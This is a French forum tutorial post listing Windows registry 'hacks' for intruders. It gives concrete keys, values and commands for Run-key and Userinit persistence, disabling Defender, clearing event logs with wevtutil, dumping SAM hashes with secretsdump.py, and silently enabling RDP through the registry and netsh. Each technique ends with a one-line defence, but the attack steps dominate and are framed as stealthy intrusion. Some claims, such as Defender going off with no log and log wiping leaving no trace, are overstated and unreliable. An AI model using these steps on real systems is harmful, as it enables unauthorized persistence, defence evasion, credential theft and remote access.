Tutorial 6 hacks de registre Windows que même Defender ne voit pas venir

Discussion dans 'Informatique' créé par Sι∂яα∂ι, 12 Juin 2025.

  1. Sι∂яα∂ι

    Sι∂яα∂ι Administrateur

    Inscrit:
    25 Juin 2014
    Messages:
    17 327
    J'aime reçus:
    58 759
    Points:
    13 043
    Le registre Windows, souvent ignoré des utilisateurs classiques, est une véritable mine d’or pour les hackers expérimentés. Il permet d’injecter des scripts au démarrage, désactiver des protections système, créer une persistance invisible… Bref, un paradis pour l’intrusion furtive.

    Accéder au Registre

    1. Appuie sur Win + R
    2. Tape regedit
    3. Navigue dans l’arborescence pour consulter ou modifier les clés.

    Structure du Registre Windows

    Le Registre se divise en cinq racines principales :
    HKCR (HKEY_CLASSES_ROOT) : Associations de fichiers et OLE.
    HKCU (HKEY_CURRENT_USER) : Préférences utilisateur actif.
    HKLM (HKEY_LOCAL_MACHINE) : Configuration matérielle et logicielle globale.
    HKU (HKEY_USERS) : Paramètres pour tous les profils.
    HKCC (HKEY_CURRENT_CONFIG) : Infos matérielles de démarrage.

    Exploits Courants du Registre

    Astuce 15 : Script malveillant en auto-exécution

    Le registre autorise l’exécution de programmes à chaque ouverture de session. Un classique, mais redoutable :
    Clé cible :
    Code:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    Créer une valeur chaîne :
    Code:
    Nom : MaliciousScript
    Valeur : C:\path\to\script.bat
    Résultat ? Le malware démarre en silence à chaque login, avec les droits de l’utilisateur.

    Défense : Analyse régulière des clés Run avec des outils comme Autoruns.

    Astuce 16 : Neutraliser Windows Defender
    Un seul changement de clé peut désactiver la protection native de Microsoft :

    Clé :
    Code:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
    Ajouter une valeur DWORD :
    Code:
    Nom : DisableAntiSpyware
    Valeur : 1
    Dès le redémarrage, Defender est totalement hors service. Aucun pop-up, aucun log.

    Défense : Bloquer les modifications via GPO, surveiller les modifications critiques.

    Astuce 17 : Effacer les journaux pour couvrir ses traces

    Un attaquant avisé cherchera toujours à effacer les preuves de son passage, notamment via les journaux d’événements Windows. Cette commande les supprime en quelques secondes :

    Commande rapide :
    Code:
    wevtutil cl System
    wevtutil cl Security
    Plus de logs système ni de logs sécurité = aucune piste à remonter.

    Défense : Centraliser les logs via un SIEM et activer la redirection automatique vers un serveur distant sécurisé.

    Astuce 18 : Injection furtive via Userinit

    Une méthode sournoise pour s’assurer que un programme malveillant se lance avant même l’ouverture de session complète :

    Clé :
    Code:
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Modifier la valeur :
    Code:
    userinit.exe,C:\chemin\vers\malware.exe
    À chaque démarrage, Windows exécute l’exe modifié en priorité.

    Défense : Monitorer les modifications de Winlogon avec un SIEM.

    Exploits Avancés du Registre

    Astuce 19 : Récupérer les mots de passe locaux

    Certains emplacements du registre contiennent des données sensibles comme les hashs NTLM des mots de passe. En combinant les fichiers `SAM` et `SYSTEM`, un attaquant peut les extraire et les cracker.

    Fichiers :
    Code:
    C:\Windows\System32\config\SAM
    C:\Windows\System32\config\SYSTEM
    Utilise secretsdump.py :
    Code:
    secretsdump.py -sam SAM -system SYSTEM LOCAL
    Puis brute force avec Hashcat ou John.

    Défense : Activer BitLocker, empêcher l'accès physique ou par Live USB.

    Astuce 20 : Activer RDP sans l’autorisation de l’admin

    Accéder à distance à un poste sans autorisation ? C’est possible via le registre :

    Clé :
    Code:
    HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
    Modifier :
    Code:
    fDenyTSConnections = 0
    Ouvrir le pare-feu :
    Code:
    netsh advfirewall firewall set rule group="remote desktop" new enable=yes
    Et voilà : le poste est prêt pour une connexion RDP à distance.

    Défense : Restreindre RDP par firewall et VPN, surveiller les ouvertures de port.

    Outils recommandés

    Regshot – Compare le registre avant/après une modification.
    Process Monitor – Surveille l’accès au registre en temps réel.
    Autoruns – Détecte les exécutables lancés au boot.

    Conclusion

    Le registre est à Windows ce que la clé de voûte est à une cathédrale : indispensable, mais exploitable. Ces techniques ne sont pas des exploits complexes, mais des détournements de fonctionnalités intégrées.

    Le comprendre, c’est mieux se défendre. Et si tu sais où regarder, tu détecteras les traces d’un pirate bien avant qu’il ne compromette tout ton réseau.

    Dans le chapitre suivant, nous découvrirons les techniques pour contourner le pare-feu Windows et Windows Defender, ainsi que les méthodes de durcissement.
     

Partager cette page

  1. Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies.
    Rejeter la notice